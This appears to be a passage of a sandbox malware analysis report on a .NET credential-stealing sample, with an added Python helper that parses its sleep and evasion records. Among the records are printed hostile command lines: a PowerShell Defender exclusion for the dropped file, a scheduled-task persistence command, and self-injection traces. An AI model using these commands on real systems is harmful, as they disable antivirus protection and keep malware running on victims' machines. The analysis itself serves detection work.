                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX (6 identical records)

                  Malware Analysis System Evasion

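The records in this section are the raw evasion indicators Joe Sandbox logged for the sample and for its dropped copy: memory reserved with a write watch, a thread delayed for 600000 ms and then re-delayed for a remainder that shrinks by roughly 110 ms per record, sleeps of 922337203685477 ms (Int64.MaxValue in 100 ns ticks converted to milliseconds, which is how a .NET infinite timeout appears), and sleep loops of more than 30 iterations. The Python helper below is an added example, not part of the report or of the analysed sample: it parses records in exactly this flattened format, aggregates them per process and names the techniques they indicate. Its embedded sample lines are a constructed excerpt in the report's format using values from this report; the 500 ms step limit for recognising a countdown loop is an assumption chosen for the example, while the 30000 ms threshold is the one the records themselves show. Two reading caveats are encoded in it: a write-watch allocation is a weak signal on its own for a .NET sample, because the CLR garbage collector reserves its heap with MEM_WRITE_WATCH as well, and the steadily shrinking delay series is the stronger sign, since it is consistent with a loop that re-sleeps for the remaining time and therefore notices when a sandbox shortens a single long sleep.

```python
"""Triage helper for flattened Joe Sandbox behaviour records (added example, not part of the report
or the sample). Parses 'Source: <process>[ TID: n]<signature>: <details>[Jump to behavior]' lines."""
import re
from collections import defaultdict

INFINITE_MS = (2**63 - 1) // 10_000   # Int64.MaxValue ticks in ms = 922337203685477, .NET infinite timeout
LONG_SLEEP_MS = 30_000                # the sandbox threshold shown in the records ('>= -30000s')
COUNTDOWN_MAX_STEP_MS = 500           # assumption: max shrink between successive re-sleeps of a remainder

RECORD_RE = re.compile(
    r"^Source:\s*(?P<proc>[A-Za-z]:\\.*?\.exe)"
    r"(?:\s+TID:\s*(?P<tid>\d+))?"
    r"(?P<sig>Thread sleep time|Thread sleep count|Thread delayed|"
    r"Memory allocated|Process information set|Window / User API):\s*"
    r"(?P<detail>.*?)(?:Jump to behavior)?\s*$"
)

def parse_record(line):
    """Return (process, tid, signature, detail), or None for lines that are not behaviour records."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    tid = int(m.group("tid")) if m.group("tid") else None
    return m.group("proc"), tid, m.group("sig"), m.group("detail").strip()

def _sleep_ms(detail):
    """'-600000s >= -30000s' -> 600000; the report prints the delay as a negative relative interval."""
    m = re.match(r"-?(\d+)s", detail)
    return int(m.group(1)) if m else None

def _is_countdown(values, min_run=3):
    """True when at least min_run successive delays each shrink by a small step (re-sleep for remainder)."""
    run = 0
    for prev, cur in zip(values, values[1:]):
        run = run + 1 if 0 < prev - cur <= COUNTDOWN_MAX_STEP_MS else 0
        if run >= min_run:
            return True
    return False

def summarise(lines):
    """Aggregate evasion indicators per process path; 'Thread delayed' values keep report order."""
    stats = defaultdict(lambda: {
        "write_watch_allocs": 0, "noopenfileerrorbox": 0, "infinite_sleeps": 0, "long_sleeps": 0,
        "total_finite_sleep_ms": 0, "max_sleep_loop_count": 0, "countdown_loop": False})
    delays = defaultdict(list)
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        proc, _tid, sig, detail = rec
        s = stats[proc]
        if sig == "Memory allocated" and "memory write watch" in detail:
            s["write_watch_allocs"] += 1
        elif sig == "Process information set" and "NOOPENFILEERRORBOX" in detail:
            s["noopenfileerrorbox"] += 1
        elif sig == "Thread sleep time" and (ms := _sleep_ms(detail)) is not None:
            if ms >= INFINITE_MS:           # Timeout.Infinite, or an accumulated total beyond it
                s["infinite_sleeps"] += 1
            else:
                s["total_finite_sleep_ms"] += ms
                if ms >= LONG_SLEEP_MS:
                    s["long_sleeps"] += 1
        elif sig == "Thread sleep count" and (m := re.match(r"(\d+)\s*>", detail)):
            s["max_sleep_loop_count"] = max(s["max_sleep_loop_count"], int(m.group(1)))
        elif sig == "Thread delayed" and (m := re.search(r"delay time:\s*(\d+)", detail)):
            delays[proc].append(int(m.group(1)))
    for proc, values in delays.items():
        stats[proc]["countdown_loop"] = _is_countdown(values)
    return dict(stats)

def evasion_flags(s):
    """Name the techniques one process's aggregated stats indicate."""
    flags = []
    if s["write_watch_allocs"]:
        flags.append("write-watch allocation (weak alone: the CLR GC reserves heap this way)")
    if s["infinite_sleeps"]:
        flags.append("infinite sleep (Int64.MaxValue ms)")
    if s["long_sleeps"]:
        flags.append("long sleep >= 30 s")
    if s["max_sleep_loop_count"] > 30:
        flags.append("sleep loop > 30 iterations")
    if s["countdown_loop"]:
        flags.append("re-sleep-for-remainder countdown (elapsed-time check)")
    return flags

# Constructed excerpt in the report's flattened format; the values are the ones this report shows.
SAMPLE_RECORDS = r"""
Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 1060000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599765Jump to behavior
Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599656Jump to behavior
Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 6776Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep count: 31 > 30Jump to behavior
Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 4156Thread sleep count: 1822 > 30Jump to behavior
Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -599875s >= -30000sJump to behavior
""".strip().splitlines()
```

To run it over a whole report, save the page text with one record per line and call `summarise(text.splitlines())`, then `evasion_flags(...)` on each entry; lines that are not behaviour records (Yara matches, headings, the `Jump to behavior` link text on its own) are ignored by `parse_record`.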
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Memory allocated (memory reserve | memory write watch) at: 1060000, 2DF0000, 2D00000, 72F0000, 82F0000, 8470000, 9470000, 99D0000, A9D0000, B9D0000, 1160000, 2CC0000, 2AC0000 (13 records)
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Memory allocated (memory reserve | memory write watch) at: 9D0000, 2490000, 4490000, 6FA0000, 7FA0000, 8140000, 66B0000, 9200000, A200000, 1110000, 2D50000, 2B90000 (12 records)
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 922337203685477 (2 records), then 600000, 599875, 599765, 599656, 599547, 599437, 599328, 599219, 599103, 598984, 598874, 598765, 598656, 598547, 598437, 598312, 598203, 598092, 597969, 597813, 597699, 597578, 597469, 597344, 597234, 597125, 597015, 596906, 596797, 596687, 596562, 596453, 596343, 596234, 596109, 596000, 595890, 595781, 595672, 595562, 595453, 595343, 595234, 595125, 595015, 594906, 594797, 594687, 594578, 594469 (50 records)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 922337203685477 (2 records), then 600000, 599859, 599734, 599616, 599516, 599406, 599297, 599188, 599063, 598938, 598813, 598703, 598583, 598453, 598344, 598234, 598125, 598016, 597904, 597797, 597687, 597578, 597468, 597359, 597250, 597138, 597031, 596922, 596813, 596688, 596563, 596438, 596313, 596203, 596094, 595969, 595860, 595735, 595610, 595485, 595360, 595235, 595110, 594985, 594860, 594735, 594610, 594485, 594360, 594235 (50 records)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7347, 2298
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Window / User API: threadDelayed 1822, 8031
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Window / User API: threadDelayed 2180, 7659
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 6776 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208 | Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096 | Thread sleep count: 31 > 30
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096 | Thread sleep time (each >= -30000s): -28592453314249787s, -600000s, -599875s, -599765s, -599656s, -599547s, -599437s, -599328s, -599219s, -599103s, -598984s, -598874s, -598765s, -598656s, -598547s, -598437s, -598312s, -598203s, -598092s, -597969s, -597813s, -597699s, -597578s, -597469s, -597344s, -597234s, -597125s, -597015s, -596906s, -596797s, -596687s, -596562s, -596453s, -596343s, -596234s, -596109s, -596000s, -595890s, -595781s, -595672s, -595562s, -595453s, -595343s, -595234s, -595125s, -595015s, -594906s, -594797s, -594687s, -594578s, -594469s (51 records)
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 4156 | Thread sleep count: 1822 > 30, 8031 > 30
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 4912 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796 | Thread sleep count: 37 > 30
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796 | Thread sleep time (each >= -30000s): -34126476536362649s, -600000s, -599859s, -599734s, -599616s, -599516s, -599406s, -599297s, -599188s, -599063s, -598938s, -598813s, -598703s, -598583s, -598453s, -598344s, -598234s, -598125s, -598016s, -597904s, -597797s, -597687s, -597578s, -597468s, -597359s, -597250s, -597138s, -597031s, -596922s, -596813s, -596688s, -596563s, -596438s, -596313s, -596203s, -596094s
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 3912 | Thread sleep count: 2180 > 30, 7659 > 30
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595969s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 600000
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 599875
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 599765
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 599656
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 599547
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 599437
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 599328
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 599219
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 599103
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 598984
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 598874
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 598765
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 598656
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 598547
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 598437
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 598312
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 598203
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 598092
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 597969
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 597813
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 597699
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 597578
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 597469
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 597344
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 597234
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 597125
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 597015
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 596906
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 596797
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 596687
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 596562
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 596453
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 596343
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 596234
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 596109
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 596000
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 595890
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 595781
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 595672
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 595562
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 595453
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 595343
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 595234
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 595125
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 595015
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 594906
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 594797
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 594687
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 594578
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Thread delayed: delay time: 594469
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 599859
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 599734
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 599616
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 599516
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 599406
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 599297
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 599188
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 599063
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 598938
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 598813
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 598703
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 598583
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 598453
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 598344
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 598234
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 598125
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 598016
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 597904
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 597797
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 597687
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 597578
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 597468
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 597359
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 597250
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 597138
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 597031
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 596922
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 596813
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 596688
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 596563
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 596438
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 596313
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 596203
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 596094
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 595969
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 595860
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 595735
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 595610
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 595485
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 595360
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 595235
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 595110
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 594985
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 594860
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 594735
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 594610
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 594485
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 594360
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Thread delayed: delay time: 594235
                  Source: gJdonuKfIrqN.exe, 0000000C.00000002.3766137317.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: UOEAjWmusE.exe, 00000007.00000002.3765628401.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllon.H
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Code function: 7_2_0116C168 LdrInitializeThunk,LdrInitializeThunk,7_2_0116C168
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, UltraSpeed.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Memory written: C:\Users\user\Desktop\UOEAjWmusE.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Memory written: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp"
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp"
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Process created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Users\user\Desktop\UOEAjWmusE.exe VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
